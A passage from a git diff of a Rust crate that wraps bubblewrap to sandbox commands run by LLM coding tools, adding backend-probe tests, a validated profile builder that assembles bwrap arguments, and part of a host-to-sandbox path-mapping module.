crate::test_helpers::{replace_path, write_script}; + use crate::Preset; + use serial_test::serial; + use tempfile::TempDir; + + // These tests swap PATH and exercise a process-wide availability cache, so + // cases that probe `bwrap` run serially to avoid cross-test contamination. + + // Reports a missing-binary error when `PATH` has no `bwrap`. + #[test] + #[serial] + fn probe_backend_classifies_missing_binary() { + let temp = TempDir::new().unwrap(); + + // Point PATH at an empty directory. + let _guard = replace_path(temp.path()); + + // Run the lookup and capture the error text. + let result = resolve_backend_or_error_for(Some(Preset::PublicBot), &Availability::Unknown); + + assert!(result.is_err()); + let err_text = format!("{:?}", result.unwrap_err()); + + // Check that the error explains the missing binary. + assert!( + err_text.contains("bwrap"), + "error should mention bwrap: {}", + err_text + ); + assert!( + err_text.contains("not found") || err_text.contains("binary"), + "error should indicate missing binary: {}", + err_text + ); + } + + // Reports an unusable-environment error when `bwrap` exists but cannot sandbox. + #[test] + #[serial] + fn probe_backend_classifies_unusable_environment() { + let temp = TempDir::new().unwrap(); + + let error_msg = "bwrap: Cannot create new namespace"; + // Make `bwrap` look installed, then fail the "can it sandbox?" probe. + let script = format!( + r#"#!/bin/sh +# Handle --version probe +for arg in "$@"; do + if [ "$arg" = "--version" ]; then + echo "bubblewrap 0.8.0" + exit 0 + fi +done +# Fail the "can it sandbox?" probe +echo "{}" >&2 +exit 1 +"#, + error_msg + ); + write_script(temp.path(), "bwrap", &script); + + // Run the probe against the fake binary. + let _guard = replace_path(temp.path()); + + let result = resolve_backend_or_error_for(Some(Preset::PublicBot), &Availability::Unknown); + + assert!(result.is_err()); + let err_text = format!("{:?}", result.unwrap_err()); + + // Check that the namespace failure reaches callers. + assert!( + err_text.contains("bwrap"), + "error should mention bwrap: {}", + err_text + ); + assert!( + err_text.contains("Cannot create new namespace"), + "error should preserve namespace error: {}", + err_text + ); + assert!( + !err_text.contains("fallback"), + "error should not mention fallback: {}", + err_text + ); + } + + // Finds `bash` when it is present on the host PATH. + #[test] + fn find_binary_on_path_finds_bash() { + // Look up `bash` on the current PATH. + let result = find_binary_on_path("bash"); + + // Keep this tolerant because some minimal environments expose only `sh`. + if let Some(path) = result { + assert!(path.ends_with("bash")); + } + } + + // Returns `None` for a binary name that does not exist. + #[test] + fn find_binary_on_path_returns_none_for_nonexistent() { + // Query a name that should never resolve. + let result = find_binary_on_path("definitely_not_a_real_binary_12345"); + assert!(result.is_none()); + } + + // Reuses a known unavailable reason instead of probing again. + #[test] + fn unavailable_config_returns_early_error() { + // Start from an availability result that already failed. + let result = resolve_backend_or_error_for( + Some(Preset::PublicBot), + &Availability::unavailable("test reason"), + ); + + assert!(result.is_err()); + let err_text = format!("{:?}", result.unwrap_err()); + + // Check that the original reason is preserved. + assert!(err_text.contains("test reason")); + assert!(err_text.contains("unavailable")); + } + + // Uses the `Custom` profile name when no preset is selected. + #[test] + #[serial] + fn custom_builder_profile_returns_execution_error_not_panic() { + let temp = TempDir::new().unwrap(); + + // Remove `bwrap` from PATH and probe the custom profile. + let _guard = replace_path(temp.path()); + let result = resolve_backend_or_error_for(None, &Availability::Unknown); + + assert!(result.is_err()); + let err_text = format!("{:?}", result.unwrap_err()); + + // Check that the error stays user-facing. + assert!( + err_text.contains("Custom"), + "error should mention Custom profile: {}", + err_text + ); + assert!( + err_text.contains("bwrap"), + "error should mention bwrap: {}", + err_text + ); + } +} diff --git a/src/llm-coding-tools-bubblewrap/src/profile/builder.rs b/src/llm-coding-tools-bubblewrap/src/profile/builder.rs new file mode 100644 index 00000000..2ce37d59 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/profile/builder.rs @@ -0,0 +1,759 @@ +//! Builder for [`crate::profile::Profile`]. +//! +//! Start with [`crate::profile::Builder::new`] for a blank builder, or use +//! [`crate::profile::Builder::public_bot`] or +//! [`crate::profile::Builder::trusted_maintenance`] for preset defaults. +//! Call [`crate::profile::Builder::build`] when you are done. + +use super::layout::{join_mapped_path, PathMapping, SandboxLayout}; +use super::types::{ + Availability, EnvVar, FileMount, FileOverlay, NetworkPolicy, Preset, Profile, Symlink, + TmpBacking, +}; +use super::validation::{ + ensure_cache_root_subdirs, validate_absolute_path, validate_directory_path, validate_env_vars, + validate_file_overlays, validate_mount_paths, validate_symlinks, validate_tmp_backing, + validate_tmpfs_overlays, +}; +use crate::probe::{first_shell_candidate_with, resolve_backend_or_error_for}; +use crate::LinuxBwrapError; +use std::ffi::OsString; +use std::fs; +use std::path::Path; +use std::sync::Arc; + +/// Builds a validated [`crate::profile::Profile`]. +/// +/// Start with [`Self::new`] for a blank builder, or use one of the preset +/// helpers. Then call [`Self::build`]. +/// +/// # Examples +/// +/// Baseline builder: +/// ```no_run +/// use llm_coding_tools_bubblewrap::profile::{Builder, TmpBacking}; +/// use std::path::Path; +/// +/// fn main() -> Result<(), llm_coding_tools_bubblewrap::LinuxBwrapError> { +/// let profile = Builder::new( +/// Path::new("/host/workspace"), // workspace: host directory mounted into the sandbox +/// Path::new("/tmp/home"), // synthetic_home: host dir mounted as $HOME inside the sandbox +/// Path::new("/tmp/cache"), // cache_root: host cache root used for sandbox cache/state dirs +/// TmpBacking::Tmpfs, // tmp_backing: how sandbox /tmp is backed (RAM or host dir) +/// ) +/// .build()?; +/// +/// assert_eq!(profile.workspace(), Path::new("/host/workspace")); +/// Ok(()) +/// } +/// ``` +/// +/// Public bot preset: +/// ```no_run +/// use llm_coding_tools_bubblewrap::profile::{Builder, TmpBacking}; +/// use std::path::Path; +/// +/// fn main() -> Result<(), llm_coding_tools_bubblewrap::LinuxBwrapError> { +/// let profile = Builder::public_bot( +/// Path::new("/host/workspace"), // workspace: host directory mounted into the sandbox +/// Path::new("/tmp/home"), // synthetic_home: host dir mounted as $HOME (/home/sandbox) inside the sandbox +/// Path::new("/tmp/cache"), // cache_root: host cache root used for sandbox cache/state dirs +/// Some(TmpBacking::Tmpfs), // tmp_backing: how sandbox /tmp is backed (RAM or host dir) +/// ) +/// .build()?; +/// +/// assert_eq!(profile.synthetic_home_dest(), Path::new("/home/sandbox")); +/// Ok(()) +/// } +/// ``` +/// +/// # Notes +/// - `workspace`, `synthetic_home`, and `cache_root` are host paths. +/// - `tmp_backing` chooses memory-backed or host-backed `/tmp`. +/// - `build` validates profile-owned paths, resolves the `bwrap` executable, +/// resolves a visible host shell, and precomputes the static `bwrap` argv. +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct Builder { + /// Preset that produced this builder, if any. + pub(crate) preset: Option, + /// Host path to the workspace directory. + pub(crate) workspace: Box, + /// Where the workspace appears inside the sandbox (defaults to [`workspace`](Self::workspace)). + pub(crate) workspace_dest: Box, + /// Host path to the synthetic home directory. + pub(crate) synthetic_home: Box, + /// Where the synthetic home appears inside the sandbox (defaults to [`synthetic_home`](Self::synthetic_home)). + pub(crate) synthetic_home_dest: Box, + /// Host path to the cache root directory. + pub(crate) cache_root: Box, + /// Backing strategy for sandbox `/tmp` (`tmpfs` or host bind). + pub(crate) tmp_backing: TmpBacking, + /// Whether the cache root is bind-mounted inside the sandbox. + pub(crate) mount_cache_root: bool, + /// Compatibility symlinks created inside the sandbox (e.g. `/usr/bin/env`). + pub(crate) compat_symlinks: Arc<[Symlink]>, + /// Host paths mounted read-only inside the sandbox. + pub(crate) read_only_mounts: Arc<[Box]>, + /// Host paths mounted read-write inside the sandbox. + pub(crate) read_write_mounts: Arc<[Box]>, + /// Sandbox paths backed by `tmpfs` (writable, discarded on exit). + pub(crate) tmpfs_overlays: Arc<[Box]>, + /// Sandbox files replaced by a read-only bind-mount of a host file. + pub(crate) file_overlays: Arc<[FileOverlay]>, + /// Individual files mounted read-only for credential injection. + pub(crate) credential_file_mounts: Arc<[FileMount]>, + /// When `true`, the entire host rootfs is mounted read-only instead of individual read-only mounts. + pub(crate) read_only_host_rootfs: bool, + /// Controls whether the sandbox has network access. + pub(crate) network_policy: NetworkPolicy, + /// When `true`, inherited env vars are cleared before applying [`default_env`](Self::default_env) and [`extra_env`](Self::extra_env). + pub(crate) clear_env: bool, + /// Env vars always set (applied before [`extra_env`](Self::extra_env)). + pub(crate) default_env: Arc<[EnvVar]>, + /// Additional env vars set on top of [`default_env`](Self::default_env). + pub(crate) extra_env: Arc<[EnvVar]>, + /// Tracks whether `bwrap` is usable (checked during [`build`](Self::build)). + pub(crate) availability: Availability, +} + +impl Builder { + /// Creates a new builder with baseline defaults and no preset. + /// + /// # Arguments + /// - `workspace` - Host path to the workspace directory. + /// - `synthetic_home` - Host path to the synthetic home directory. + /// - `cache_root` - Host path to the cache root directory. + /// - `tmp_backing` - How sandbox `/tmp` is mounted. + /// + /// # Defaults + /// - `workspace_dest` and `synthetic_home_dest` are set to match the host paths. + /// - `mount_cache_root` is `true`. + /// - Mount and env lists start empty. + /// - `network_policy` is `Disabled`. + /// - `clear_env` is `false`. + /// - `availability` is `Unknown`. + pub fn new( + workspace: impl Into>, + synthetic_home: impl Into>, + cache_root: impl Into>, + tmp_backing: TmpBacking, + ) -> Self { + let workspace = workspace.into(); + let synthetic_home = synthetic_home.into(); + + Self { + preset: None, + workspace_dest: workspace.clone(), + workspace, + synthetic_home_dest: synthetic_home.clone(), + synthetic_home, + cache_root: cache_root.into(), + tmp_backing, + mount_cache_root: true, + compat_symlinks: Arc::new([]), + read_only_mounts: Arc::new([]), + read_write_mounts: Arc::new([]), + tmpfs_overlays: Arc::new([]), + file_overlays: Arc::new([]), + credential_file_mounts: Arc::new([]), + read_only_host_rootfs: false, + network_policy: NetworkPolicy::Disabled, + clear_env: false, + default_env: Arc::new([]), + extra_env: Arc::new([]), + availability: Availability::Unknown, + } + } + + /// Sets the preset that produced this builder. + /// + /// This is an internal helper used by preset constructors. + pub(crate) fn with_preset(mut self, preset: Preset) -> Self { + self.preset = Some(preset); + self + } + + /// Consumes the builder and produces a ready-to-run [`Profile`]. + /// + /// Ensures cache-root subdirectories exist, validates all builder fields, + /// resolves the `bwrap` executable on the host, locates a shell visible + /// inside the sandbox, and precomputes the static `bwrap` argument vector. + /// + /// # Returns + /// + /// A [`Profile`] carrying the resolved `bwrap` path, shell path, and + /// prebuilt argument list — everything needed to launch the sandbox. + /// + /// # Errors + /// + /// Returns [`LinuxBwrapError`] when any of the following checks fail: + /// + /// - Cache-root subdirectory creation (depends on preset). + /// - Path validation: host paths must exist and be absolute directories; + /// destination paths must be absolute; credential file sources must be + /// regular files inside the sandbox mount tree. + /// - Environment variable names must not contain `=`. + /// - Symlink targets and link paths must be absolute. + /// - Tmpfs overlay paths must be absolute. + /// - The `bwrap` backend must be available on the host. + /// - At least one host shell (`bash` or `sh`) must be visible inside the + /// sandbox given the current mount configuration. + pub fn build(self) -> Result { + ensure_cache_root_subdirs(self.mount_cache_root, self.cache_root.as_ref())?; + validate_builder(&self)?; + let bwrap_program = resolve_backend_or_error_for(self.preset, &self.availability)?; + let shell = resolve_shell_for_builder(&self)?; + let static_args = build_static_args(&self); + + Ok(Profile { + preset: self.preset, + workspace: self.workspace, + workspace_dest: self.workspace_dest, + synthetic_home: self.synthetic_home, + synthetic_home_dest: self.synthetic_home_dest, + cache_root: self.cache_root, + tmp_backing: self.tmp_backing, + mount_cache_root: self.mount_cache_root, + compat_symlinks: self.compat_symlinks, + read_only_mounts: self.read_only_mounts, + read_write_mounts: self.read_write_mounts, + tmpfs_overlays: self.tmpfs_overlays, + file_overlays: self.file_overlays, + credential_file_mounts: self.credential_file_mounts, + read_only_host_rootfs: self.read_only_host_rootfs, + network_policy: self.network_policy, + clear_env: self.clear_env, + default_env: self.default_env, + extra_env: self.extra_env, + availability: Availability::Available, + bwrap_program, + shell, + static_args, + }) + } + + /// Sets where the workspace appears inside the sandbox. + pub fn with_workspace_dest(mut self, dest: impl Into>) -> Self { + self.workspace_dest = dest.into(); + self + } + + /// Sets where the synthetic home appears inside the sandbox. + pub fn with_synthetic_home_dest(mut self, dest: impl Into>) -> Self { + self.synthetic_home_dest = dest.into(); + self + } + + /// Sets whether to mount the cache root. + pub fn with_mount_cache_root(mut self, mount_cache_root: bool) -> Self { + self.mount_cache_root = mount_cache_root; + self + } + + /// Sets the backing strategy for sandbox `/tmp`. + pub fn with_tmp_backing(mut self, tmp_backing: TmpBacking) -> Self { + self.tmp_backing = tmp_backing; + self + } + + /// Replaces the compatibility symlink list. + pub fn with_compat_symlinks(mut self, compat_symlinks: impl Into>) -> Self { + self.compat_symlinks = compat_symlinks.into(); + self + } + + /// Replaces the read-only mount list. + pub fn with_read_only_mounts(mut self, mounts: impl Into]>>) -> Self { + self.read_only_mounts = mounts.into(); + self + } + + /// Replaces the read-write mount list. + pub fn with_read_write_mounts(mut self, mounts: impl Into]>>) -> Self { + self.read_write_mounts = mounts.into(); + self + } + + /// Replaces the tmpfs overlay list. + pub fn with_tmpfs_overlays(mut self, mounts: impl Into]>>) -> Self { + self.tmpfs_overlays = mounts.into(); + self + } + + /// Replaces the file overlay list. + /// + /// Each overlay replaces a sandbox file with a read-only bind-mount of + /// the specified host source file. + pub fn with_file_overlays(mut self, overlays: impl Into>) -> Self { + self.file_overlays = overlays.into(); + self + } + + /// Replaces the credential file mount list. + pub fn with_credential_file_mounts(mut self, mounts: impl Into>) -> Self { + self.credential_file_mounts = mounts.into(); + self + } + + /// Sets whether to mount the host root read-only. + pub fn with_read_only_host_rootfs(mut self, enabled: bool) -> Self { + self.read_only_host_rootfs = enabled; + self + } + + /// Sets the network policy. + pub fn with_network_policy(mut self, policy: NetworkPolicy) -> Self { + self.network_policy = policy; + self + } + + /// Sets whether to clear inherited env vars. + pub fn with_clear_env(mut self, clear: bool) -> Self { + self.clear_env = clear; + self + } + + /// Replaces the default env var list. + pub fn with_default_env(mut self, env: impl Into>) -> Self { + self.default_env = env.into(); + self + } + + /// Replaces the extra env var list. + pub fn with_extra_env(mut self, env: impl Into>) -> Self { + self.extra_env = env.into(); + self + } + + /// Sets the stored availability state. + pub fn with_availability(mut self, availability: Availability) -> Self { + self.availability = availability; + self + } +} + +fn validate_builder(builder: &Builder) -> Result<(), LinuxBwrapError> { + validate_directory_path(builder.workspace.as_ref(), "workspace host directory")?; + validate_directory_path( + builder.synthetic_home.as_ref(), + "synthetic home host directory", + )?; + validate_absolute_path(builder.cache_root.as_ref(), "cache root host path")?; + if builder.mount_cache_root { + validate_directory_path(builder.cache_root.as_ref(), "cache root host directory")?; + } + + validate_absolute_path(builder.workspace_dest.as_ref(), "workspace destination")?; + validate_absolute_path( + builder.synthetic_home_dest.as_ref(), + "synthetic home destination", + )?; + validate_tmp_backing(&builder.tmp_backing)?; + validate_mount_paths(&builder.read_only_mounts, "read-only mount source")?; + validate_mount_paths(&builder.read_write_mounts, "read-write mount source")?; + validate_tmpfs_overlays(&builder.tmpfs_overlays)?; + validate_file_overlays(&builder.file_overlays)?; + validate_symlinks(&builder.compat_symlinks)?; + validate_env_vars(builder.default_env.as_ref(), "default")?; + validate_env_vars(builder.extra_env.as_ref(), "extra")?; + validate_credential_file_mounts(builder)?; + Ok(()) +} + +fn validate_credential_file_mounts(builder: &Builder) -> Result<(), LinuxBwrapError> { + for mount in builder.credential_file_mounts.iter() { + validate_absolute_path(mount.source(), "credential file source")?; + validate_absolute_path(mount.dest(), "credential file destination")?; + + let metadata = fs::metadata(mount.source()).map_err(|error| { + LinuxBwrapError::InvalidPath(format!( + "credential file source must exist and be readable: {} ({error})", + mount.source().display() + )) + })?; + if !metadata.is_file() { + return Err(LinuxBwrapError::InvalidPath(format!( + "credential file source must be a regular file: {}", + mount.source().display() + ))); + } + if !credential_dest_is_allowed(builder, mount.dest()) { + return Err(LinuxBwrapError::InvalidPath(format!( + "credential file destination must stay within the synthetic home, workspace, or cache root: {}", + mount.dest().display() + ))); + } + } + + Ok(()) +} + +fn credential_dest_is_allowed(builder: &Builder, dest: &Path) -> bool { + dest.starts_with(builder.synthetic_home_dest.as_ref()) + || dest.starts_with(builder.workspace_dest.as_ref()) + || (builder.mount_cache_root && dest.starts_with(builder.cache_root.as_ref())) +} + +fn resolve_shell_for_builder(builder: &Builder) -> Result, LinuxBwrapError> { + let layout = builder_sandbox_layout(builder); + if let Some((_host_shell, sandbox_path)) = first_shell_candidate_with(|shell| { + layout.classify(shell).map(|mapping| match mapping { + PathMapping::SamePath => shell.to_path_buf(), + PathMapping::Remap { + dest_prefix, + relative, + } => join_mapped_path(dest_prefix, relative).into_owned(), + }) + }) { + return Ok(sandbox_path.into_boxed_path()); + } + + Err(LinuxBwrapError::Execution( + "no usable host shell is visible inside the linux sandbox; expected a system `bash` or `sh` mounted by the selected profile" + .to_string(), + )) +} + +fn builder_sandbox_layout(builder: &Builder) -> SandboxLayout<'_> { + SandboxLayout { + workspace: builder.workspace.as_ref(), + workspace_dest: builder.workspace_dest.as_ref(), + synthetic_home: builder.synthetic_home.as_ref(), + synthetic_home_dest: builder.synthetic_home_dest.as_ref(), + cache_root: builder.cache_root.as_ref(), + mount_cache_root: builder.mount_cache_root, + tmp_backing: &builder.tmp_backing, + read_only_host_rootfs: builder.read_only_host_rootfs, + tmpfs_overlays: builder.tmpfs_overlays.as_ref(), + file_overlays: builder.file_overlays.as_ref(), + read_only_mounts: builder.read_only_mounts.as_ref(), + read_write_mounts: builder.read_write_mounts.as_ref(), + } +} + +fn build_static_args(builder: &Builder) -> Arc<[OsString]> { + let mut args = Vec::with_capacity(arg_capacity_for(builder)); + + args.extend([ + OsString::from("--die-with-parent"), + OsString::from("--new-session"), + ]); + + if matches!(builder.network_policy, NetworkPolicy::Disabled) { + args.push(OsString::from("--unshare-net")); + } + if builder.clear_env { + args.push(OsString::from("--clearenv")); + } + push_env_args(&mut args, builder.default_env.as_ref()); + push_env_args(&mut args, builder.extra_env.as_ref()); + + if builder.read_only_host_rootfs { + push_bind(&mut args, "--ro-bind", Path::new("/"), Path::new("/")); + } + push_tmpfs_mounts(&mut args, builder.tmpfs_overlays.as_ref()); + push_file_overlay_mounts(&mut args, builder.file_overlays.as_ref()); + if !builder.read_only_host_rootfs { + push_same_path_binds(&mut args, "--ro-bind", builder.read_only_mounts.as_ref()); + } + push_symlinks(&mut args, builder.compat_symlinks.as_ref()); + args.extend([ + OsString::from("--dev"), + OsString::from("/dev"), + OsString::from("--proc"), + OsString::from("/proc"), + ]); + push_tmp_mount(&mut args, &builder.tmp_backing); + push_bind( + &mut args, + "--bind", + builder.synthetic_home.as_ref(), + builder.synthetic_home_dest.as_ref(), + ); + if builder.mount_cache_root { + push_bind( + &mut args, + "--bind", + builder.cache_root.as_ref(), + builder.cache_root.as_ref(), + ); + } + push_bind( + &mut args, + "--bind", + builder.workspace.as_ref(), + builder.workspace_dest.as_ref(), + ); + push_same_path_binds(&mut args, "--bind", builder.read_write_mounts.as_ref()); + push_file_mounts(&mut args, builder.credential_file_mounts.as_ref()); + + Arc::from(args) +} + +fn arg_capacity_for(builder: &Builder) -> usize { + let env_count = builder.default_env.len() + builder.extra_env.len(); + let ro_slots = if builder.read_only_host_rootfs { + 3 + } else { + builder.read_only_mounts.len() * 3 + }; + let mount_slots = ro_slots + + builder.read_write_mounts.len() * 3 + + builder.credential_file_mounts.len() * 3 + + builder.compat_symlinks.len() * 3 + + builder.tmpfs_overlays.len() * 2 + + builder.file_overlays.len() * 3 + + usize::from(builder.mount_cache_root) * 3; + let tmp_slots = match builder.tmp_backing { + TmpBacking::Tmpfs => 2, + TmpBacking::BindHost(_) => 3, + }; + let fixed_slots = 12 + + usize::from(builder.clear_env) + + usize::from(matches!(builder.network_policy, NetworkPolicy::Disabled)); + + fixed_slots + env_count * 3 + mount_slots + tmp_slots +} + +fn push_bind(args: &mut Vec, flag: &str, source: &Path, dest: &Path) { + args.push(OsString::from(flag)); + args.push(source.as_os_str().into()); + args.push(dest.as_os_str().into()); +} + +fn push_symlinks(args: &mut Vec, symlinks: &[Symlink]) { + for symlink in symlinks { + args.push(OsString::from("--symlink")); + args.push(OsString::from(symlink.target())); + args.push(symlink.link_path().as_os_str().into()); + } +} + +fn push_env_args(args: &mut Vec, env_vars: &[EnvVar]) { + for var in env_vars { + args.push(OsString::from("--setenv")); + args.push(OsString::from(var.name())); + args.push(OsString::from(var.value())); + } +} + +fn push_same_path_bind(args: &mut Vec, flag: &str, path: &Path) { + args.push(OsString::from(flag)); + args.push(path.as_os_str().into()); + args.push(path.as_os_str().into()); +} + +fn push_same_path_binds(args: &mut Vec, flag: &str, paths: &[Box]) { + for path in paths { + push_same_path_bind(args, flag, path); + } +} + +fn push_tmpfs_mounts(args: &mut Vec, paths: &[Box]) { + for path in paths { + args.push(OsString::from("--tmpfs")); + args.push(path.as_os_str().into()); + } +} + +fn push_file_overlay_mounts(args: &mut Vec, overlays: &[FileOverlay]) { + for overlay in overlays { + push_bind(args, "--ro-bind", overlay.source(), overlay.dest()); + } +} + +fn push_tmp_mount(args: &mut Vec, tmp_backing: &TmpBacking) { + match tmp_backing { + TmpBacking::Tmpfs => { + args.push(OsString::from("--tmpfs")); + args.push(OsString::from("/tmp")); + } + TmpBacking::BindHost(host_dir) => push_bind(args, "--bind", host_dir, Path::new("/tmp")), + } +} + +fn push_file_mounts(args: &mut Vec, mounts: &[FileMount]) { + for mount in mounts { + push_bind(args, "--ro-bind", mount.source(), mount.dest()); + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::test_helpers::{SandboxDirs, SandboxFixture}; + use serial_test::serial; + use tempfile::TempDir; + + #[test] + #[serial] + fn empty_builder_builds_identity_destinations_and_empty_collections() { + let fixture = SandboxFixture::new("exit 0"); + let workspace = fixture.temp_path().to_path_buf(); + let home = fixture.home().to_path_buf(); + let cache = fixture.cache().to_path_buf(); + + let profile = Builder::new(&*workspace, &*home, &*cache, TmpBacking::Tmpfs) + .build() + .unwrap(); + + assert_eq!(profile.workspace(), workspace.as_path()); + assert_eq!(profile.workspace_dest(), workspace.as_path()); + assert_eq!(profile.synthetic_home(), home.as_path()); + assert_eq!(profile.synthetic_home_dest(), home.as_path()); + assert_eq!(profile.cache_root(), cache.as_path()); + assert_eq!(profile.tmp_backing(), &TmpBacking::Tmpfs); + assert!(profile.compat_symlinks().is_empty()); + assert!(profile.read_only_mounts().is_empty()); + assert!(profile.read_write_mounts().is_empty()); + assert!(profile.tmpfs_overlays().is_empty()); + assert!(profile.credential_file_mounts().is_empty()); + assert!(profile.default_env().is_empty()); + assert!(profile.extra_env().is_empty()); + assert!(profile.mount_cache_root()); + assert!(!profile.read_only_host_rootfs()); + assert!(!profile.clear_env()); + assert_eq!(profile.network_policy(), NetworkPolicy::Disabled); + assert_eq!(profile.preset(), None); + assert!(profile.availability().is_available()); + assert!(profile.bwrap_program().ends_with("bwrap")); + assert!(profile.shell().ends_with("bash") || profile.shell().ends_with("sh")); + assert!(!profile.static_args().is_empty()); + } + + #[test] + #[serial] + fn preset_builder_can_still_be_customized_before_build() { + let fixture = SandboxFixture::new("exit 0"); + let workspace = fixture.temp_path().to_path_buf(); + let host_tmp = fixture.make_dir("host-tmp"); + + let profile = Builder::new( + &*workspace, + fixture.home(), + fixture.cache(), + TmpBacking::Tmpfs, + ) + .with_preset(Preset::PublicBot) + .with_mount_cache_root(true) + .with_tmp_backing(TmpBacking::BindHost(host_tmp.clone().into_boxed_path())) + .with_extra_env(Arc::from([EnvVar::new("FOO", "bar")])) + .build() + .unwrap(); + + assert_eq!(profile.preset(), Some(Preset::PublicBot)); + assert!(profile.mount_cache_root()); + assert_eq!( + profile.tmp_backing(), + &TmpBacking::BindHost(host_tmp.into_boxed_path()) + ); + assert_eq!(profile.extra_env().len(), 1); + assert_eq!(profile.extra_env()[0].name(), "FOO"); + assert_eq!(profile.extra_env()[0].value(), "bar"); + } + + #[test] + #[serial] + fn arg_capacity_for_matches_actual_push_count() { + let fixture = SandboxFixture::new("exit 0"); + let workspace = fixture.temp_path().to_path_buf(); + let home = fixture.home().to_path_buf(); + let cache = fixture.cache().to_path_buf(); + let host_tmp = fixture.make_dir("host-tmp"); + let cred_file = fixture.temp_path().join("cred.txt"); + fs::write(&cred_file, "secret").unwrap(); + + let builder = Builder::new( + &*workspace, + &*home, + &*cache, + TmpBacking::BindHost(host_tmp.into_boxed_path()), + ) + .with_read_only_host_rootfs(true) + .with_network_policy(NetworkPolicy::Disabled) + .with_clear_env(true) + .with_default_env(Arc::from([EnvVar::new("A", "1"), EnvVar::new("B", "2")])) + .with_extra_env(Arc::from([EnvVar::new("C", "3")])) + .with_compat_symlinks(Arc::from([Symlink::new( + "/usr/bin/python3", + Path::new("/usr/bin/python3"), + )])) + .with_tmpfs_overlays(Arc::from([Path::new("/run").into()])) + .with_credential_file_mounts(Arc::from([FileMount::new( + cred_file.into_boxed_path(), + Path::new("/sandbox/cred.txt"), + )])) + .with_read_write_mounts(Arc::from([Path::new("/data").into()])); + + let capacity = arg_capacity_for(&builder); + let args = build_static_args(&builder); + assert_eq!(args.len(), capacity); + } + + #[test] + #[serial] + fn arg_capacity_for_minimal_builder() { + let fixture = SandboxFixture::new("exit 0"); + let workspace = fixture.temp_path().to_path_buf(); + let home = fixture.home().to_path_buf(); + let cache = fixture.cache().to_path_buf(); + + let builder = Builder::new(&*workspace, &*home, &*cache, TmpBacking::Tmpfs); + + let capacity = arg_capacity_for(&builder); + let args = build_static_args(&builder); + assert_eq!(args.len(), capacity); + } + + #[test] + fn build_rejects_invalid_env_var_names() { + let dirs = SandboxDirs::new(); + + let err = Builder::new( + dirs.workspace(), + dirs.home(), + dirs.cache(), + TmpBacking::Tmpfs, + ) + .with_default_env(Arc::from([EnvVar::new("BAD=NAME", "value")])) + .build() + .unwrap_err(); + + assert!(format!("{err}").contains("must not contain '='")); + } + + #[test] + fn build_rejects_unavailable_backend_reason() { + let dirs = SandboxDirs::new(); + + let err = Builder::new( + dirs.workspace(), + dirs.home(), + dirs.cache(), + TmpBacking::Tmpfs, + ) + .with_availability(Availability::unavailable("bwrap blocked by policy")) + .build() + .unwrap_err(); + + assert!(format!("{err}").contains("bwrap blocked by policy")); + assert!(format!("{err}").contains("unavailable")); + } + + #[test] + fn public_bot_preset_rejects_nonexistent_workspace_directory() { + let temp = TempDir::new().unwrap(); + let home = temp.path().join("home"); + let cache = temp.path().join("cache"); + fs::create_dir(&home).unwrap(); + fs::create_dir(&cache).unwrap(); + let workspace = temp.path().join("workspace_does_not_exist"); + + let err = Builder::public_bot(&*workspace, &*home, &*cache, Some(TmpBacking::Tmpfs)) + .with_availability(Availability::Available) + .build() + .unwrap_err(); + + assert!(format!("{err}").contains("workspace host directory")); + } +} diff --git a/src/llm-coding-tools-bubblewrap/src/profile/layout.rs b/src/llm-coding-tools-bubblewrap/src/profile/layout.rs new file mode 100644 index 00000000..535efa3a --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/profile/layout.rs @@ -0,0 +1,170 @@ +//! Given a host path, determine whether it is reachable inside the sandbox +//! and where it appears. +//! +//! A bubblewrap sandbox hides the host filesystem and re-exposes only +//! specific directories (workspace, home, `/tmp`, extra mounts). +//! +//! Callers need this to pick a usable shell, translate a working directory, +//! or validate a user-supplied path before launching a sandboxed command. + +use super::types::{FileOverlay, TmpBacking}; +use std::borrow::Cow; +use std::path::{Path, PathBuf}; + +/// Snapshot of the path-mapping rules that determine which host paths are +/// reachable inside the sandbox and where they appear. +/// +/// Constructed from either a [`Profile`][super::types::Profile] or an +/// in-progress [`Builder`][super::builder::Builder] and passed to +/// [`SandboxLayout::classify`]. +#[derive(Clone, Copy)] +pub(crate) struct SandboxLayout<'a> { + pub(crate) workspace: &'a Path, + pub(crate) workspace_dest: &'a Path, + pub(crate) synthetic_home: &'a Path, + pub(crate) synthetic_home_dest: &'a Path, + pub(crate) cache_root: &'a Path, + pub(crate) mount_cache_root: bool, + pub(crate) tmp_backing: &'a TmpBacking, + pub(crate) read_only_host_rootfs: bool, + pub(crate) tmpfs_overlays: &'a [Box], + pub(crate) file_overlays: &'a [FileOverlay], + pub(crate) read_only_mounts: &'a [Box], + pub(crate) read_write_mounts: &'a [Box], +} + +/// Describes where a host path ends up inside the sandbox. +pub(crate) enum PathMapping<'config, 'path> { + /// The path appears at the same absolute location in the sandbox. + SamePath, + /// The path appears under a different prefix inside the sandbox. + /// + /// The sandbox path is `dest_prefix` joined with `relative`. + Remap { + dest_prefix: &'config Path, + relative: &'path Path, + }, +} + +impl<'config> SandboxLayout<'config> { + /// Determines how `entry` appears inside the sandbox, if at all. + /// + /// Returns [`Some`] with the mapping when the host path is reachable, + /// [`None`] when it is hidden (not mounted, or covered by a tmpfs overlay). + /// Relative paths are always `None`. + pub(crate) fn classify(self, entry: &Path) -> Option> { + // Relative paths have no fixed location inside the sandbox. + if !entry.is_absolute() { + return None; + } + // Workspace: the project directory the sandbox is allowed to read/write. + if let Some(mapping) = map_prefix(entry, self.workspace, self.workspace_dest) { + return Some(mapping); + } + // Synthetic home: the sandbox's $HOME, bind-mounted from the host. + if let Some(mapping) = map_prefix(entry, self.synthetic_home, self.synthetic_home_dest) { + return Some(mapping); + } + // Caller-provided tmp directory, remapped to /tmp inside the sandbox. + if let TmpBacking::BindHost(host_dir) = self.tmp_backing { + if let Some(mapping) = map_prefix(entry, host_dir, Path::new("/tmp")) { + return Some(mapping); + } + } + // Cache root: mounted read-write when enabled. + if self.mount_cache_root && entry.starts_with(self.cache_root) { + return Some(PathMapping::SamePath); + } + // Extra mounts: user-specified read-only and read-write bind mounts. + // Both appear after tmpfs/file overlays in the bwrap arg list, so they + // always take precedence over any overlay at overlapping paths. + if self + .read_only_mounts + .iter() + .chain(self.read_write_mounts.iter()) + .any(|mount| entry.starts_with(mount.as_ref())) + { + return Some(PathMapping::SamePath); + } + // Read-only host rootfs: everything else is visible unless a tmpfs + // overlay hides it. + if self.read_only_host_rootfs + && !path_hidden_by_overlay( + self.tmpfs_overlays, + 